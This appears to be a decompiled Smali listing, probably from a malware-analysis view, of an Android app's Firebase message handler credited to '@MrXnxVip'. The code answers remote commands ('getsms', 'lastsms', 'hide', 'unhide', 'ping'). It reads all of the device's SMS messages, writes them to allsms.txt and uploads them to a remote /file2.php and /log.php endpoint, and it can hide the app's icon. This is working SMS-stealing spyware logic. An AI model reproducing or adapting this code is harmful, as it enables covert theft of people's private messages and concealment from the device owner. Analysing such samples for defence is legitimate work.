                        • offlinemode.txt
                        • offlinemode2.txt
                        • offmode2
                        • 61310773
                        • ON
                        • offmode
                        • result=ok&action=pingone&androidid=
                        • pingone
                        • 61310755
                        • \u0633\u0644\u0627\u0645
                        • 61310751
                        • bmb
                        • hideall
                        • 61310738
                        • result=ok&action=ping&androidid=
                        • ping
                        • 61310721
                        • action
                        • phone
                        • text
                        • numberbmb
                        • numberoff
                        • androidid
                        • -
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/Exception;
                        3}
                        4.end annotation
                        5move-object/from16 v1, p0
                        7const-string v2, "\n"
                        8cond_4: iget v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        9try_end_6: const/16 v4, 0x56
                        10const/16 v8, 0x51
                        11const/16 v9, 0x4c
                        12const/16 v10, 0x52
                        14const-string v15, "&osVersion="
                        16const-string v6, "no"
                        18const-string v5, "/log.php"
                        20const-string v13, "&model="
                        22const-string v12, ""
                        24const-string v11, "&opr="
                        25const/4 v7, 0x1
                        26const/4 v14, 0x0
                        27packed-switch v3, :pswitch_data_74a
                        28pswitch_1f: goto/16 :goto_4
                        29try_start_20: iput v10, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        30goto/16 :goto_4
                        31pswitch_23: const/16 v3, 0x57
                        32iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        33iget v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_i:I
                        34add-int/2addr v3, v14
                        35iget v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->step99:I
                        36add-int/2addr v3, v4
                        37iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_i:I
                        38goto/16 :goto_4
                        39pswitch_30: const/16 v3, 0x49
                        40iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        41iget v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->step99:I
                        42if-lez v3, :cond_3e
                        43iget v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_i:I
                        44iget v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->limit99:I
                        45if-le v3, v4, :cond_48
                        46cond_3e: iget v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->step99:I
                        47if-gez v3, :cond_4
                        48iget v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_i:I
                        49iget v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->limit99:I
                        50if-lt v3, v4, :cond_4
                        51cond_48: const/16 v3, 0x48
                        52iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        53goto/16 :goto_4
                        54pswitch_4d: const/4 v3, -0x1
                        55iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        56goto/16 :goto_4
                        57pswitch_51: iput v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        58goto/16 :goto_4
                        59pswitch_54: const/16 v3, 0x55
                        60iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        61new-instance v3, Lanywheresoftware/b4a/objects/collections/List;
                        63invoke-direct {v3}, Lanywheresoftware/b4a/objects/collections/List;-><init>()V
                        64iput-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_listsms:Lanywheresoftware/b4a/objects/collections/List;
                        65new-instance v3, Lanywheresoftware/b4a/phone/SmsWrapper;
                        67invoke-direct {v3}, Lanywheresoftware/b4a/phone/SmsWrapper;-><init>()V
                        68iput-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_sa:Lanywheresoftware/b4a/phone/SmsWrapper;
                        69iput-object v12, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_lasts:Ljava/lang/String;
                        71invoke-virtual {v3}, Lanywheresoftware/b4a/phone/SmsWrapper;->GetAll()Lanywheresoftware/b4a/objects/collections/List;
                        72move-result-object v3
                        73iput-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_listsms:Lanywheresoftware/b4a/objects/collections/List;
                        75invoke-virtual {v3, v14}, Lanywheresoftware/b4a/objects/collections/List;->Get(I)Ljava/lang/Object;
                        76move-result-object v3
                        78invoke-static {v3}, Lanywheresoftware/b4a/BA;->ObjectToString(Ljava/lang/Object;)Ljava/lang/String;
                        79move-result-object v3
                        80iput-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_lasts:Ljava/lang/String;
                        81new-instance v3, Ljava/lang/StringBuilder;
                        83invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        85const-string v4, "result=ok&action=lastsms&androidid="
                        87invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        89sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        91invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        93invoke-virtual {v3, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        95sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv4:Ljava/lang/String;
                        97invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        99invoke-virtual {v3, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        101sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        103invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        105const-string v4, "&message="
                        107invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        109iget-object v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_lasts:Ljava/lang/String;
                        111invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        113invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        114move-result-object v3
                        115sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        117sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v5:Lcom/MrXnxVip/global/httpjob;
                        118new-instance v4, Ljava/lang/StringBuilder;
                        120invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        122sget-object v6, Lcom/MrXnxVip/global/firebasemessaging;->mostCurrent:Lcom/MrXnxVip/global/firebasemessaging;
                        124iget-object v6, v6, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvv3:Lcom/MrXnxVip/global/information;
                        126sget-object v6, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        128invoke-virtual {v4, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        130invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        132invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        133move-result-object v4
                        135sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        137invoke-virtual {v3, v4, v5}, Lcom/MrXnxVip/global/httpjob;->_vvvvvvv6(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        138goto/16 :goto_4
                        139pswitch_c5: const/16 v3, 0x55
                        140iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        142sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        144const-string v4, "lastsms"
                        146invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        147move-result v3
                        148if-eqz v3, :cond_4
                        149const/16 v3, 0x54
                        150iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        151goto/16 :goto_4
                        152pswitch_d9: iput v10, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        153iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        155sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        156const/16 v4, 0x7d0
                        158invoke-static {v3, v1, v4}, Lanywheresoftware/b4a/keywords/Common;->Sleep(Lanywheresoftware/b4a/BA;Lanywheresoftware/b4a/BA$ResumableSub;I)V
                        159const/16 v3, 0x59
                        160iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        161return-void
                        162pswitch_e9: iput v8, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        163iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        165sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        167invoke-static {v3, v12}, Lanywheresoftware/b4a/keywords/Common;->StartService(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)V
                        168goto/16 :goto_4
                        169pswitch_f4: iput v8, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        170const/16 v3, 0x50
                        171iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        173sget-object v3, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        175sget-object v3, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        177invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternal()Ljava/lang/String;
                        178move-result-object v3
                        180const-string v4, "allsms.txt"
                        182iget-object v5, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_allsms22:Ljava/lang/String;
                        184invoke-static {v3, v4, v5}, Lanywheresoftware/b4a/objects/streams/File;->WriteString(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
                        186sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v5:Lcom/MrXnxVip/global/httpjob;
                        187new-instance v4, Ljava/lang/StringBuilder;
                        189invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        191sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->mostCurrent:Lcom/MrXnxVip/global/firebasemessaging;
                        193iget-object v5, v5, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvv3:Lcom/MrXnxVip/global/information;
                        195sget-object v5, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        197invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        199const-string v5, "/file2.php?result=ok&action=uploadsms&androidid="
                        201invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        203sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        205invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        207invoke-virtual {v4, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        209sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->_vv4:Ljava/lang/String;
                        211invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        213invoke-virtual {v4, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        215sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        217invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        219invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        220move-result-object v4
                        222sget-object v5, Lanywheresoftware/b4a/keywords/Common;->File:Lanywheresoftware/b4a/objects/streams/File;
                        224invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternal()Ljava/lang/String;
                        225move-result-object v5
                        227const-string v6, "allsms.txt"
                        229invoke-virtual {v3, v4, v5, v6}, Lcom/MrXnxVip/global/httpjob;->_vvvvvvv4(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        231const-string v3, "61310854"
                        233const-string v4, "true"
                        235invoke-static {v3, v4, v14}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        236goto/16 :goto_4
                        237pswitch_14b: iput v8, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        238iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        239const/16 v3, 0x50
                        240iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        241const/16 v3, 0x4e
                        242iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        243goto/16 :goto_4
                        244pswitch_159: iput v9, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        245iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        247sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->processBA:Lanywheresoftware/b4a/BA;
                        249invoke-static {v3, v12}, Lanywheresoftware/b4a/keywords/Common;->StartService(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)V
                        250goto/16 :goto_4
                        251pswitch_164: iput v9, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        252goto/16 :goto_4
                        253pswitch_168: const/16 v3, 0x58
                        254iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        256sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v0:Lanywheresoftware/b4a/objects/collections/List;
                        257iget v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_i:I
                        259invoke-virtual {v3, v4}, Lanywheresoftware/b4a/objects/collections/List;->Get(I)Ljava/lang/Object;
                        260move-result-object v3
                        261check-cast v3, Lanywheresoftware/b4a/phone/SmsWrapper$Sms;
                        262sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vv1:Lanywheresoftware/b4a/phone/SmsWrapper$Sms;
                        263new-instance v3, Ljava/lang/StringBuilder;
                        265invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        267iget-object v4, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_allsms22:Ljava/lang/String;
                        269invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        271const-string v4, "Sender : "
                        273invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        275sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv1:Lanywheresoftware/b4a/phone/SmsWrapper$Sms;
                        277iget-object v4, v4, Lanywheresoftware/b4a/phone/SmsWrapper$Sms;->Address:Ljava/lang/String;
                        279invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        281invoke-virtual {v3, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        283const-string v4, "Text : "
                        285invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        287sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv1:Lanywheresoftware/b4a/phone/SmsWrapper$Sms;
                        289iget-object v4, v4, Lanywheresoftware/b4a/phone/SmsWrapper$Sms;->Body:Ljava/lang/String;
                        291invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        293invoke-virtual {v3, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        295const-string v4, "Date : "
                        297invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        299sget-object v4, Lanywheresoftware/b4a/keywords/Common;->DateTime:Lanywheresoftware/b4a/keywords/DateTime;
                        301sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv1:Lanywheresoftware/b4a/phone/SmsWrapper$Sms;
                        302iget-wide v4, v4, Lanywheresoftware/b4a/phone/SmsWrapper$Sms;->Date:J
                        304invoke-static {v4, v5}, Lanywheresoftware/b4a/keywords/DateTime;->Date(J)Ljava/lang/String;
                        305move-result-object v4
                        307invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        309const-string v4, " "
                        311invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        313sget-object v4, Lanywheresoftware/b4a/keywords/Common;->DateTime:Lanywheresoftware/b4a/keywords/DateTime;
                        315sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv1:Lanywheresoftware/b4a/phone/SmsWrapper$Sms;
                        316iget-wide v4, v4, Lanywheresoftware/b4a/phone/SmsWrapper$Sms;->Date:J
                        318invoke-static {v4, v5}, Lanywheresoftware/b4a/keywords/DateTime;->Time(J)Ljava/lang/String;
                        319move-result-object v4
                        321invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        323invoke-virtual {v3, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        325const-string v4, "\ud83d\udda5\ud83d\udcf1Developer By @MrXnxVip"
                        327invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        329invoke-virtual {v3, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        331invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        332move-result-object v3
                        333iput-object v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_allsms22:Ljava/lang/String;
                        334goto/16 :goto_4
                        335pswitch_1d7: const/16 v3, 0x49
                        336iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        337iput v7, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->step99:I
                        338const/16 v3, 0x32
                        339iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->limit99:I
                        340iput v14, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_i:I
                        341const/16 v3, 0x57
                        342iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        343goto/16 :goto_4
                        344pswitch_1e9: const/16 v3, 0x46
                        345iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        346const/16 v3, 0x4b
                        347iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        348iput-object v12, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->_allsms22:Ljava/lang/String;
                        350sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v0:Lanywheresoftware/b4a/objects/collections/List;
                        352invoke-virtual {v3}, Lanywheresoftware/b4a/objects/collections/List;->Initialize()V
                        354sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vv2:Lanywheresoftware/b4a/phone/SmsWrapper;
                        356invoke-virtual {v3}, Lanywheresoftware/b4a/phone/SmsWrapper;->GetAll()Lanywheresoftware/b4a/objects/collections/List;
                        357move-result-object v3
                        358sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v0:Lanywheresoftware/b4a/objects/collections/List;
                        359goto/16 :goto_4
                        360pswitch_202: iput v9, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        361const/16 v3, 0x4b
                        362iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->catchState:I
                        363const/16 v3, 0x45
                        364iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        365goto/16 :goto_4
                        366pswitch_20e: const/16 v3, 0x43
                        367iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        369const-string v3, "61310838"
                        371const-string v4, "Get SmS is OK"
                        373invoke-static {v3, v4, v14}, Lanywheresoftware/b4a/keywords/Common;->LogImpl(Ljava/lang/String;Ljava/lang/String;I)V
                        374goto/16 :goto_4
                        375pswitch_21b: iput v10, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        377sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        379const-string v4, "getsms"
                        381invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        382move-result v3
                        383if-eqz v3, :cond_4
                        384const/16 v3, 0x42
                        385iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        386goto/16 :goto_4
                        387pswitch_22d: const/16 v3, 0x40
                        388iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        390invoke-static {v14}, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvvv1(Z)Ljava/lang/String;
                        391new-instance v3, Ljava/lang/StringBuilder;
                        393invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        395const-string v4, "result=ok&action=unhide&androidid="
                        397invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        399sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        401invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        403invoke-virtual {v3, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        405sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv4:Ljava/lang/String;
                        407invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        409invoke-virtual {v3, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        411sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        413invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        415invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        416move-result-object v3
                        417sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        419sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v5:Lcom/MrXnxVip/global/httpjob;
                        420new-instance v4, Ljava/lang/StringBuilder;
                        422invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        424sget-object v6, Lcom/MrXnxVip/global/firebasemessaging;->mostCurrent:Lcom/MrXnxVip/global/firebasemessaging;
                        426iget-object v6, v6, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvv3:Lcom/MrXnxVip/global/information;
                        428sget-object v6, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        430invoke-virtual {v4, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        432invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        434invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        435move-result-object v4
                        437sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        439invoke-virtual {v3, v4, v5}, Lcom/MrXnxVip/global/httpjob;->_vvvvvvv6(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        440goto/16 :goto_4
                        441pswitch_277: const/16 v3, 0x40
                        442iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        444sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        446const-string v4, "unhide"
                        448invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        449move-result v3
                        450if-eqz v3, :cond_4
                        451const/16 v3, 0x3f
                        452iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        453goto/16 :goto_4
                        454pswitch_28b: const/16 v3, 0x3d
                        455iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        457invoke-static {v7}, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvvv1(Z)Ljava/lang/String;
                        458new-instance v3, Ljava/lang/StringBuilder;
                        460invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        462const-string v4, "result=ok&action=hideicon&androidid="
                        464invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        466sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv3:Ljava/lang/String;
                        468invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        470invoke-virtual {v3, v13}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        472sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv4:Ljava/lang/String;
                        474invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        476invoke-virtual {v3, v11}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        478sget-object v4, Lcom/MrXnxVip/global/firebasemessaging;->_vv5:Ljava/lang/String;
                        480invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        482invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        483move-result-object v3
                        484sput-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        486sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_v5:Lcom/MrXnxVip/global/httpjob;
                        487new-instance v4, Ljava/lang/StringBuilder;
                        489invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        491sget-object v6, Lcom/MrXnxVip/global/firebasemessaging;->mostCurrent:Lcom/MrXnxVip/global/firebasemessaging;
                        493iget-object v6, v6, Lcom/MrXnxVip/global/firebasemessaging;->_vvvvvvvvvv3:Lcom/MrXnxVip/global/information;
                        495sget-object v6, Lcom/MrXnxVip/global/information;->_vvvv6:Ljava/lang/String;
                        497invoke-virtual {v4, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        499invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        501invoke-virtual {v4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        502move-result-object v4
                        504sget-object v5, Lcom/MrXnxVip/global/firebasemessaging;->_vvv4:Ljava/lang/String;
                        506invoke-virtual {v3, v4, v5}, Lcom/MrXnxVip/global/httpjob;->_vvvvvvv6(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        507goto/16 :goto_4
                        508pswitch_2d5: const/16 v3, 0x3d
                        509iput v3, v1, Lcom/MrXnxVip/global/firebasemessaging$ResumableSub_fm_MessageArrived;->state:I
                        511sget-object v3, Lcom/MrXnxVip/global/firebasemessaging;->_vvv1:Ljava/lang/String;
                        513const-string v4, "hide"
                        515invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
